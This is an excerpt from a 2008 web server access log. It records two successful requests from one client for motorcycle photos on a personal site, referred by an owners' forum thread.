67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
67.183.50.246 - - [07/Apr/2008:13:24:02 -0700] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13" "www.dmulk.com"
